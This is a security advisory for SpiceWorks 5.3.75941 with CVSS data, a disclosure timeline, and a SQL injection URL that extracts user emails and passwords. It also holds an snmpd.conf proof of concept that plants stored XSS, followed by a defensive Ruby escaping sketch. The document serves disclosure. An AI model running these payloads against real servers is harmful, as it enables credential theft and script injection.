SpiceWorks 5.3.75941 Stored XSS and SQL Injection

2012.07.24
Credit: muts
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89, CWE-79


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Product: SpiceWorks
Version: 5.3.75941
Vendor Site: http://www.spiceworks.com/community/
Software Download Link: http://www.spiceworks.com/download/?utm_source=comm-secondary-link&utm_medium=website&utm_campaign=homepage
Installer Filename: Spiceworks.exe
MD5: 023bd361c0f9402dc07adbc5a72fe31d
Contact: http://www.spiceworks.com/contact/

Timeline:
04 Jun 2012: Vulnerability reported to CERT
08 Jun 2012: Response received from CERT with disclosure date of 20 Jul 2012
23 Jul 2012: Update received from CERT: No response from vendor
23 Jul 2012: Public Disclosure

SQL Injection (Post-Authentication):

http://server/api_v2.json?queries[device][class]=Device&queries[device][select]=id,b_manufacturer,manufacturer,b_model,model,operating_system,device_type&queries[device][conditions]=id=14%29%20UNION%20SELECT%20NULL,%20NULL,%20NULL,%20email,%20NULL,%20NULL,%20password%20from%20users%20where%20id=1--

Stored XSS:

An attacker can configure their snmpd.conf file to contain malicious JavaScript as shown in the proof of concept below:

rocommunity public
com2sec local localhost public
view systemview included .1.3.6.1.2.1.1
view systemview included .1.3.6.1.2.1.25.1.1
view systemview included .1 80
syslocation <script>alert('location')</script>
syscontact <script>alert('contact')</script>
sysName dook<script>alert('name')</script>
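
Mitigation sketch for the stored XSS, as an added example that is not part of the original advisory and not SpiceWorks code: SNMP system-group strings collected during discovery are treated as untrusted, normalised and flagged at ingest, and HTML-encoded at render time. The function names, field list and sample record are assumptions made for illustration.

```ruby
require 'erb'

# SNMP system-group fields that a scanned device fully controls.
SNMP_TEXT_FIELDS = %w[sysName sysLocation sysContact].freeze
MAX_LEN = 255 # SNMP DisplayString values are at most 255 octets

# Normalise one device-supplied value at ingest: force valid UTF-8,
# drop control characters, cap the length.
def normalize_snmp_value(raw)
  raw.to_s.scrub('?').gsub(/[[:cntrl:]]/, '')[0, MAX_LEN]
end

# Markup characters in these fields are worth an alert on their own.
def suspicious?(value)
  value.match?(/[<>]/)
end

# Ingest: returns [clean_record, names_of_flagged_fields].
def ingest_device(snmp)
  record = SNMP_TEXT_FIELDS.to_h { |f| [f, normalize_snmp_value(snmp[f])] }
  flagged = record.select { |_, v| suspicious?(v) }.keys
  [record, flagged]
end

# Render: encode for the HTML context at output time, whatever ingest did.
def render_device_row(record)
  cells = SNMP_TEXT_FIELDS.map do |f|
    "<td>#{ERB::Util.html_escape(record[f])}</td>"
  end
  "<tr>#{cells.join}</tr>"
end

# Constructed sample: the values a device returns with the snmpd.conf above.
SAMPLE = {
  'sysName'     => "dook<script>alert('name')</script>",
  'sysLocation' => "<script>alert('location')</script>",
  'sysContact'  => "<script>alert('contact')</script>"
}.freeze

if __FILE__ == $PROGRAM_NAME
  record, flagged = ingest_device(SAMPLE)
  puts "flagged fields: #{flagged.join(', ')}"
  puts render_device_row(record)
end
```

The flag is a detection signal only; the encoding in render_device_row is what keeps the stored value from executing in the inventory page.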




Copyright 2024, cxsecurity.com

 
